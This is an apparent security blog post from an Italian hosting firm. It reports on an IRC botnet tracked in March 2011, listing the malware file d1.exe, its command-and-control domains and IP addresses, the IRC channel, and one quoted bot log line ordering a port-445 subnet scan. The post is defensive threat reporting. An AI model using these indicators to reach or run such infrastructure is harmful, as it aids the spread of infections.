Botnet report #4

Posted on by

This report refer to a botnet tracking done on March 21,2011. Botnet is allocated at Radore Hosting Telekomunikasyon Hizmetleri (Turkey). Involved ip’s (partial list) are 178.211.56.104178.211.56.105178.211.56.90 – 178.211.56.102. Reported by Divisione ricerca e sicurezza – servermanaged.it.




File : d1.exe

Main botnet domains :

java.KUTLUFAMILY.COM – 178.211.56.105 – 178.211.56.104

www.bitcity.org – 178.211.56.105 – 178.211.56.104

Looks that after execution d1.exe search for java.KUTLUFAMILY.COM and www.bitcity.org and succesfully make a connections to C&C servers. Main botnet channel is #d1 on 178.211.56.104. Bot client give a JOIN #d1 and wait for commands issued by botnet operator, usually given via a private message. Main purpose of botnet is to scan entire subnets looking for more victims to infect :

PRIVMSG [N00_ITA_XP_8209..@ :scan; Sequential Port Scan started on 192.168.1.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.

But before this the botnet operator instruct bot to download a faked copy of zUtil.exe hosted usually on 178.211.56.90. Probaby zUtil.exe serve as scanning and bot control tool.

Partial list of ip’s involved in the botnet are : 178.211.56.104178.211.56.105178.211.56.90 – 178.211.56.102

Divisione ricerca e sicurezza – servermanaged.it

Condividi questo post!

Post simili:

One thought on “Botnet report #4

  1. Pingback: Malware report #2 « Servizi managed e gestione server – servermanaged.it blog

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>